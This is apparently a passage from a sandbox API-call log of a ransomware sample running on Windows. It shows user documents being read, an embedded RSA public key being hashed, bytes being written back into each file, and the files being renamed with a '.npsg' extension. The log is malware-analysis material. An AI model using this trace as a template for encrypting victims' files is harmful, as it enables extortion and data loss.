hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=78369) returned 1 [0246.534] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.536] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x131fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.536] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.538] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x13221, lpOverlapped=0x0) returned 1 [0246.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.538] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.539] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.539] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.539] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.539] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.539] GetLastError () returned 0x0 [0246.540] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.540] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.540] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.540] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.540] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.540] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.541] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13221, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.541] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.541] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.541] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.541] CloseHandle (hObject=0x644) returned 1 [0246.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.552] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\AM6e0BljY itmS.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\am6e0bljy itms.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\AM6e0BljY itmS.rtf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\am6e0bljy itms.rtf.npsg")) returned 1 [0246.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.553] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.555] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6374c990, ftCreationTime.dwHighDateTime=0x1d5be10, ftLastAccessTime.dwLowDateTime=0xadad530, ftLastAccessTime.dwHighDateTime=0x1d5bfbf, ftLastWriteTime.dwLowDateTime=0xadad530, ftLastWriteTime.dwHighDateTime=0x1d5bfbf, nFileSizeHigh=0x0, nFileSizeLow=0x135d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ck7Alt.pdf", cAlternateFileName="")) returned 1 [0246.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.555] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\Ck7Alt.pdf") returned=".pdf" [0246.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\wX25LV54WV\\Ck7Alt.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\wx25lv54wv\\ck7alt.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.556] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=79316) returned 1 [0246.556] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.558] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x135ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.558] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.560] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.560] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x135d4, lpOverlapped=0x0) returned 1 [0246.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.561] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.561] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.562] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.562] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.562] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.562] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.562] GetLastError () returned 0x0 [0246.562] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.562] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.562] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.563] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.563] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x135d0) returned 0x3b99d50 [0246.563] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b901e0 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891e0 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b90228 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891f8 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89288 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89240 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7b830 [0246.564] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7b830, Size=0x218) returned 0x3b90a38 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa00 [0246.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89288 | out: hHeap=0x620000) returned 1 [0246.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89288 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x33734f8 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89240 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89228 [0246.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b80030 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7fce8 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b80030 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89240 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89288 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.565] GetCurrentThreadId () returned 0x5b4 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8b1b8 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.566] GetCurrentThreadId () returned 0x5b4 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89288 [0246.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89228 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89240 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89210 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b892a0 [0246.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89270 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89258 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b892b8 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89258 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89258 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89270 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89228 | out: hHeap=0x620000) returned 1 [0246.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89228 [0246.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 